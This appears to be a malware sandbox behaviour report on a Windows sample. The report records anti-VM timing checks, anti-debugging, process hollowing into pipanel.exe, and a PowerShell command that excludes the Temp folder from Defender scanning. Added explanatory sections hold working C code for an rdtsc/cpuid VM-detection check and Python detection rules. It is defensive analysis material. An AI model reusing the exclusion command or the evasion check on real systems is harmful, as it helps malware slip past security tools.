Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030058D3 7_2_030058D3
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030058EE 7_2_030058EE
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005C38 7_2_03005C38
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005C53 7_2_03005C53
Source: C:\Users\user\Desktop\mDHwap5GlV.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe API/Special instruction interceptor: Address: 3030AE8
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe API/Special instruction interceptor: Address: 3030B19
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030A88 second address: 3030A8A instructions: 0x00000000 rdtsc 0x00000002 rdtsc
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030A8A second address: 3030AE8 instructions: 0x00000000 rdtsc 0x00000002 push dx 0x00000004 mov ax, word ptr [esp] 0x00000008 jmp 00007FF40087ED63h 0x0000000a xchg word ptr [esp], bp 0x0000000e pushad 0x0000000f not al 0x00000011 xchg eax, ebp 0x00000012 xchg ax, dx 0x00000014 pushfd 0x00000015 jmp 00007FF40087ED0Fh 0x00000017 bswap ebp 0x00000019 lea ebp, dword ptr [00000000h+edi*4] 0x00000020 mov eax, esp 0x00000022 mov dword ptr [esp+1Dh], edi 0x00000026 jmp 00007FF40087ED5Ah 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030AE8 second address: 3030B19 instructions: 0x00000000 rdtsc 0x00000002 mov word ptr [esp+06h], sp 0x00000007 lea edx, dword ptr [edi+edi] 0x0000000a mov dword ptr [esp+04h], esi 0x0000000e mov dx, ax 0x00000011 pop ax 0x00000013 jmp 00007FF401882807h 0x00000015 lea edx, dword ptr [00000000h+ebx*4] 0x0000001c lea esp, dword ptr [esp+11h] 0x00000020 setp al 0x00000023 mov edx, esp 0x00000025 jmp 00007FF40188284Bh 0x00000027 mov al, 34h 0x00000029 not bp 0x0000002c setne ah 0x0000002f setnp dl 0x00000032 xchg edx, eax 0x00000034 mov ebp, eax 0x00000036 jmp 00007FF4018828ADh 0x00000038 xchg word ptr [esp+07h], dx 0x0000003d pop word ptr [esp+0Ch] 0x00000042 lea eax, dword ptr [esp+1F1D9B4Eh] 0x00000049 mov dword ptr [esp+06h], esp 0x0000004d push word ptr [esp+10h] 0x00000052 mov dword ptr [esp+0Ch], edx 0x00000056 jmp 00007FF401882797h 0x0000005b lea ebp, dword ptr [edx-00000087h] 0x00000061 mov dh, 66h 0x00000063 not bp 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030B19 second address: 3030B7F instructions: 0x00000000 rdtsc 0x00000002 push dword ptr [esp+02h] 0x00000006 jmp 00007FF40087ED6Ch 0x00000008 lea eax, dword ptr [00000000h+edi*4] 0x0000000f not al 0x00000011 not ax 0x00000014 bswap eax 0x00000016 not bp 0x00000019 mov ebp, B44F9BA3h 0x0000001e jmp 00007FF40087ECF2h 0x00000020 mov bp, word ptr [esp+09h] 0x00000025 xchg byte ptr [esp+09h], dl 0x00000029 mov dh, ch 0x0000002b pop ebp 0x0000002c mov ebp, esp 0x0000002e lea esp, dword ptr [esp+03h] 0x00000032 jmp 00007FF40087ED5Eh 0x00000034 mov al, byte ptr [esp] 0x00000037 mov bp, 3896h 0x0000003b mov dh, cl 0x0000003d mov ebp, dword ptr [esp] 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030991 second address: 3030981 instructions: 0x00000000 rdtsc 0x00000002 lea esi, dword ptr [00000000h+eax*4] 0x00000009 lea ebx, dword ptr [esi+ebp] 0x0000000c xchg dx, di 0x0000000f pop ax 0x00000011 jmp 00007FF401882806h 0x00000013 mov word ptr [esp+04h], si 0x00000018 xchg ah, cl 0x0000001a xchg al, dl 0x0000001c rdtsc
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 31D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 5170000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 4EF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: ECB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 10CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 12970000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 13970000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 14010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 16010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 19010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00BD5DD0 rdtsc 0_2_00BD5DD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Window / User API: threadDelayed 444 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Window / User API: threadDelayed 436 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1916 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 772 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe API coverage: 6.9 %
Source: C:\Users\user\Desktop\mDHwap5GlV.exe TID: 2008 Thread sleep count: 444 > 30 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe TID: 5332 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe TID: 3608 Thread sleep count: 436 > 30 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe TID: 2008 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 180 Thread sleep count: 1916 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304 Thread sleep count: 772 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3448 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe TID: 1464 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe TID: 3176 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: mDHwap5GlV.exe Binary or memory string: VMware
Source: mDHwap5GlV.exe Binary or memory string: Hyper-V
Source: mDHwap5GlV.exe Binary or memory string: QEMU
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.0000000005171000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V<
Source: pipanel.exe, 00000008.00000002.3302032676.0000000003224000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3300982057.0000000003224000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3301790108.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.0000000003224000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.0000000005171000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU<
Source: mDHwap5GlV.exe, 00000000.00000002.2590464295.000000000C4DD000.00000004.00000020.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000003.1974381057.000000000C4D2000.00000004.00000020.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000003.1792977855.000000000C4F4000.00000004.00000020.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000003.2564527873.000000000C4DD000.00000004.00000020.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000003.1863009432.000000000C4F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.0000000005171000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware<
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
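The "RDTSC instruction interceptor" entries above show decrypted_app_1.exe reading the time-stamp counter twice with an obfuscated filler sequence between the reads. The classic form of that check, written here as an added example (it is not code from the sample or from the sandbox), places a serialising CPUID between the two reads: CPUID causes a VM exit on most hypervisors, so the measured delta is much larger inside a VM than on bare metal. The threshold and sample count are assumptions for illustration, not values taken from this sample; on a non-x86 build host the `#else` branch substitutes a monotonic clock so the code still compiles, which is explicitly not what the sample does.

```c
/* Added example: rdtsc/cpuid timing check of the kind the sandbox flags.
 * Not code from mDHwap5GlV.exe or decrypted_app_1.exe. */
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#include <x86intrin.h>
/* Cycles elapsed across one CPUID, measured with rdtsc before and after.
 * CPUID is serialising and traps to the hypervisor on most VMs. */
static uint64_t timed_cpuid(void) {
    unsigned eax = 0, ebx, ecx, edx;
    uint64_t t0 = __rdtsc();
    __cpuid(0, eax, ebx, ecx, edx);
    uint64_t t1 = __rdtsc();
    (void)eax; (void)ebx; (void)ecx; (void)edx;
    return t1 - t0;
}
#else
#include <time.h>
/* Assumed portable fallback for non-x86 hosts (nanoseconds, not cycles);
 * it only keeps the example buildable and is not the sample's technique. */
static uint64_t timed_cpuid(void) {
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (uint64_t)(b.tv_sec - a.tv_sec) * 1000000000ull
         + (uint64_t)(b.tv_nsec - a.tv_nsec);
}
#endif

static int cmp_u64(const void *x, const void *y) {
    uint64_t a = *(const uint64_t *)x, b = *(const uint64_t *)y;
    return (a > b) - (a < b);
}

/* Median of n timed samples. The median is used rather than a single
 * reading so that one interrupt or context switch cannot inflate the
 * result and produce a false "VM" verdict. */
uint64_t median_cpuid_cycles(int n) {
    if (n <= 0) return 0;
    uint64_t *s = malloc(sizeof *s * (size_t)n);
    if (!s) return 0;
    for (int i = 0; i < n; i++) s[i] = timed_cpuid();
    qsort(s, (size_t)n, sizeof *s, cmp_u64);
    uint64_t m = s[n / 2];
    free(s);
    return m;
}

/* Verdict: 1 when the median delta exceeds the threshold (VM suspected). */
int looks_virtualized(uint64_t median, uint64_t threshold) {
    return median > threshold;
}

int main(void) {
    /* Assumed threshold: bare-metal CPUID usually costs a few hundred
     * cycles, a VM exit typically costs thousands. Real samples tune this. */
    const uint64_t THRESHOLD = 1000;
    uint64_t m = median_cpuid_cycles(101);
    printf("median rdtsc delta around cpuid: %llu -> %s\n",
           (unsigned long long)m,
           looks_virtualized(m, THRESHOLD) ? "VM suspected" : "likely bare metal");
    return 0;
}
```

Sandboxes counter this either by intercepting rdtsc (which is what the "interceptor" entries above indicate) or by exposing a TSC offset that hides the exit cost; the "Potentially malicious time measurement code found" verdict is the sandbox noting that the sample performs exactly this kind of measurement.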

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030058D3 Start: 03005C96 End: 03005C9F 7_2_030058D3
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030058EE Start: 03005C96 End: 03005C9F 7_2_030058EE
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005C38 Start: 03005C96 End: 03005C9F 7_2_03005C38
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005C53 Start: 03005C96 End: 03005C9F 7_2_03005C53
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00BD5DD0 rdtsc 0_2_00BD5DD0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00B300D0 IsDebuggerPresent, 0_2_00B300D0
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001237 mov edx, dword ptr fs:[00000030h] 7_2_03001237
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002932 mov edx, dword ptr fs:[00000030h] 7_2_03002932
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_0300370B mov eax, dword ptr fs:[00000030h] 7_2_0300370B
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005FE5 mov edx, dword ptr fs:[00000030h] 7_2_03005FE5
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030106AF mov eax, dword ptr fs:[00000030h] 7_2_030106AF
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030106C0 mov eax, dword ptr fs:[00000030h] 7_2_030106C0
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002578 mov ebx, dword ptr fs:[00000030h] 7_2_03002578
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00BC2010 GetProcessHeap,RtlAllocateHeap, 0_2_00BC2010
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00E2E559 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00E2E559
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\"
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory allocated: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory allocated: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2EC0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory allocated: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2ED0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_009B06A0 IsDebuggerPresent,RaiseFailFastException,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,DebugBreak,SetErrorMode,SetErrorMode, 0_2_009B06A0
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: PID: 3732 base: 76F02EC0 value: E9 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 442000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 445000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 456000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 457000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2C5C008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2EC0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 76F02EC0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2ED0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 31D2D00 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 31D2CFC Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\" Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe" Jump to behavior
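The three steps recorded above are each detectable from ordinary endpoint telemetry: a Defender exclusion added for a user-writable directory, a process whose image (pipanel.exe) does not match the executable named on its own command line (decrypted_app_1.exe), and cross-process writes that start with an MZ header or a single `E9` (jmp rel32) opcode. The following Python is an added example of that detection logic, not code from the report or from any sensor. The event dictionaries are constructed for the example and shaped after the report entries; their field names, the list of user-writable locations, and the base64 `-EncodedCommand` handling are this example's assumptions, not a real sensor's schema.

```python
"""Added example: detection logic for the evasion chain shown in the report.
Not code from Joe Sandbox, the sample, or any EDR product."""
import base64
import re
from pathlib import PureWindowsPath

# Assumed list of locations an unprivileged user can write to; an exclusion
# pointing here lets the dropped payload run unscanned.
USER_WRITABLE = (r"\appdata\local\temp", r"\appdata\roaming", r"\users\public",
                 r"\programdata", r"\windows\temp")

# Constructed telemetry modelled on the report's process-creation and
# memory-write entries (the last event is a benign control).
EVENTS = [
    {"type": "process_create", "parent": r"C:\Users\user\Desktop\mDHwap5GlV.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\"'},
    {"type": "process_create", "parent": r"C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe",
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe"'},
    {"type": "remote_write", "source": r"C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe",
     "target": r"C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe",
     "base": 0x400000, "first_bytes": "4D5A"},
    {"type": "remote_write", "source": r"C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe",
     "target": r"C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe",
     "base": 0x76F02EC0, "first_bytes": "E9"},
    {"type": "process_create", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" a.txt'},
]


def encode_powershell_command(script: str) -> str:
    """Base64 of UTF-16LE, the encoding PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded script if the command line uses -EncodedCommand (or a
    prefix such as -enc), else an empty string. Covers the base64 variant the
    Sigma rule for MpPreference cmdlets targets."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def defender_exclusion_abuse(cmdline: str):
    """Excluded path if Add-MpPreference targets a user-writable directory, else None."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    m = re.search(r"add-mppreference\b.*?-exclusionpath\s+\"?([^\"\s]+)", text, re.I | re.S)
    if not m:
        return None
    path = m.group(1)
    return path if any(marker in path.lower() for marker in USER_WRITABLE) else None


def launched_exe(cmdline: str) -> str:
    """argv[0] of a Windows command line, honouring a leading quoted token."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def image_cmdline_mismatch(image: str, cmdline: str) -> bool:
    """True when argv[0] names a different .exe than the process image, the
    hallmark of a hollowed or replaced process such as pipanel.exe here."""
    exe = PureWindowsPath(launched_exe(cmdline)).name.lower()
    img = PureWindowsPath(image).name.lower()
    return bool(exe) and exe.endswith(".exe") and exe != img


def classify_remote_write(ev: dict):
    """Heuristic on the first bytes of a cross-process write (assumed thresholds)."""
    fb = ev["first_bytes"].upper()
    if fb.startswith("4D5A"):
        return "PE image written into foreign process at 0x%X" % ev["base"]
    if fb == "E9":
        return "JMP rel32 opcode written into foreign process at 0x%X (possible inline hook)" % ev["base"]
    return None


def analyze(events):
    """Run every rule over the event stream; returns (rule, detail) pairs."""
    hits = []
    for ev in events:
        if ev["type"] == "process_create":
            path = defender_exclusion_abuse(ev["cmdline"])
            if path:
                hits.append(("defender_exclusion_user_writable", path))
            if image_cmdline_mismatch(ev["image"], ev["cmdline"]):
                hits.append(("image_cmdline_mismatch", ev["image"] + " <- " + ev["cmdline"]))
        elif ev["type"] == "remote_write":
            detail = classify_remote_write(ev)
            if detail:
                hits.append(("foreign_memory_write", detail))
    return hits


if __name__ == "__main__":
    for rule, detail in analyze(EVENTS):
        print(f"[{rule}] {detail}")
```

The image/command-line comparison is the cheapest of the three signals and needs no memory telemetry at all: legitimate launches of pipanel.exe carry its own path in argv[0]. The exclusion rule checks both the plain and the base64-encoded forms because the same cmdlet is routinely wrapped in `-EncodedCommand` to defeat string matching on the visible command line.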
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: TrayNotifyWndShell_TrayWndU
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: Shell_TrayWnd
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: SHELL_TRAYWND
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: Shell_TrayWndtooltips_class32SV
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: Shell_TrayWndU
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: PROGMAN
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: SHELL_TRAYWNDU
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00E2F13E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00E2F13E
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: pipanel.exe, 00000008.00000003.3251284815.00000000032AA000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3251424268.0000000003287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: pipanel.exe PID: 3732, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
